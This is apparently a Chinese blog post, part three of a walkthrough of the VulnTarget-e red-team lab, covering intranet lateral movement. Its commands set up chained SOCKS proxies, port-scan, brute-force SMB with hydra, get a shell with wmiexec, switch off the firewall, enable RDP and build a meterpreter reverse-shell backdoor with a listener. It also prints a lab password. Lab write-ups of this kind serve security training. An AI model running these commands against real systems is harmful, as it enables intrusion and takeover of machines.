红蓝对抗靶场之内网渗透【三】
2023-6-9 08:2:41 Author: 李白你好(查看原文) 阅读量:22 收藏

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!

0x01 前言

发的文章水一点吧,要被说没营养。
写的文章有干货点吧又没人看读量一点都没有。哥们真的太难了

接前两篇

VulnTarget-e边界主机权限获取【一】

红蓝对抗靶场VulnTarget-e之内网渗透【二】

以下是红蓝对抗靶场VulnTarget-e域内主机Win2008R2的打法。

涉及知识点

二级代理内网横向

0x02 二级代理

步骤一:这里为了使kali攻击机能访问到192.168.88.0/24网段的第三台主机需要要搭建二级代理。将 边界主机的2080 端口收到的 socks 代理请求转交给 ubuntu192.168.100.131 的主机 操作如下..
边界主机
ew.exe -s lcx_tran -l 2080 -f 192.168.100.131 -g 9999
文件上传
proxychains scp -r -i key /home/z4pts/桌面/ew [email protected]168.100.131:/www/wwwroot/vulntarget-e2/ew
内网主机
/root/ew -s ssocksd -l 9999 &  //置于后台运行
配置测试代理
vi /etc/proxychains4.confsocks5 192.168.1.5 2080proxychains curl http://192.168.88.100/
步骤二:这里挂代理开始扫描在ubuntu机器中收集到的102主机发现开放135和445端口!
proxychains nmap -Pn -sT -p1-65535 192.168.88.102
步骤三:这里尝试使用hydra对其SMB协议进行爆破...
proxychains hydra -l administrator -P password.txt 192.168.88.102 smb

0x03 内网横向

步骤四:根据以上爆破的结果使用Impacket中提供的wmiexec.py工具远程连接其命令执行环境获取交互式接口..

proxychains python3 wmiexec.py administrator@192.168.88.102chcp 65001

步骤五:执行以下命令进行信息收集并开启关闭相对应的功能...

whoami     //win-n4dk5rpd2qu\administratorhostname   //win-n4dk5rpd2quipconfig /all     //域:vulntarget.com  192.168.88.102/24  10.0.10.9/24arp -a    //10.0.10.10 netsh advfirewall set allprofiles state off    //关闭防火墙REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f      //开启3389端口

步骤六:在MSF上开启代理在外界windows主机上使用SocksCap64挂上代理访问远程桌面,如下成功!!!

开启代理

use auxiliary/server/socks_proxy   show options   run

主机信息

ip address:192.168.88.102username:administratorpassword:admin@123

0x04 上线MSF

步骤七:使用一下命令生成反向马并监听反弹,直接远程桌面复制过去上线成功..
生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.100 LPORT=4444 -f exe > inside.exe
开启监听
msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.88.100set lport 4444run
第三篇结束,还有最后一篇该靶场打法就全部写完了。

0x05 往期精彩

VulnTarget-e边界主机权限获取【一】

红蓝对抗靶场VulnTarget-e之内网渗透【二】


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247499027&idx=1&sn=fc6a535b99681e3f5adcf6de36714254&chksm=c09a8e43f7ed0755fe044fd0d79293e092193e16418c1b7d5d2708c9568e0c3a4490ba45400f#rd
如有侵权请联系:admin#unsafe.sh